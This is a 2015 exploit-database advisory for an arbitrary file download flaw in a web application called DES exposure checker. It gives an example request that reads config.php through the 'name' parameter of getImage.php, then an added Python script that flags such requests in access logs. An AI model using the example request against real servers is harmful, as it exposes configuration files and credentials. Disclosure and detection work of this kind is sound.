DES exposure checker - Arbitrary File Download Vulnerability

2015-02-08T00:00:00
ID 1337DAY-ID-23255
Type zdt
Reporter Conslight
Modified 2015-02-08T00:00:00

Description

DES exposure checker is a free web application, used to see how real DES images look.

                                        
This vulnerability allows any kind of user to download a file from the remote server, such as PHP files, TXT files, etc.

Theory : http://{SERVER}/getImage.php?name={FILE.EXT}

Example : http://victim.com/getImage.php?name=config.php
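To check whether the `name` parameter described above has been used against a deployment, the following added example (not part of the original advisory or of the application's code) scans web-server access logs for `getImage.php` requests that ask for anything other than a plain image file. The combined log format, the image-extension allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import urlsplit, parse_qs

# Assumption: the endpoint is only meant to serve these image types.
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}
# Request line and status code of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_name(name):
    """Return a reason if `name` is not a bare image file name, else None."""
    if "/" in name or "\\" in name:
        return "path component"
    if PurePosixPath(name).suffix.lower() not in IMAGE_EXTS:
        return "non-image extension"
    return None

def scan(lines):
    """Yield (line_no, status, name, reason) for flagged getImage.php requests."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/getimage.php"):
            continue
        # parse_qs URL-decodes the value once, as the web server would.
        for name in parse_qs(url.query, keep_blank_values=True).get("name", []):
            reason = suspicious_name(name)
            if reason:
                yield no, int(m.group(2)), name, reason

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Feb/2015:10:00:01 +0000] "GET /getImage.php?name=sample01.png HTTP/1.1" 200 48211',
    '203.0.113.9 - - [08/Feb/2015:10:02:13 +0000] "GET /getImage.php?name=config.php HTTP/1.1" 200 912',
    '203.0.113.9 - - [08/Feb/2015:10:02:20 +0000] "GET /getImage.php?name=readme.txt HTTP/1.1" 404 0',
    '203.0.113.7 - - [08/Feb/2015:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for no, status, name, reason in scan(SAMPLE_LOG):
        # A 200 status means the file was actually returned to the client.
        served = "SERVED" if status == 200 else "not served"
        print(f"line {no}: name={name!r} ({reason}), HTTP {status}, {served}")
```

Flagged requests that returned HTTP 200 are the ones to triage first, since the requested file was sent to the client.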

#  0day.today [2018-04-14]  #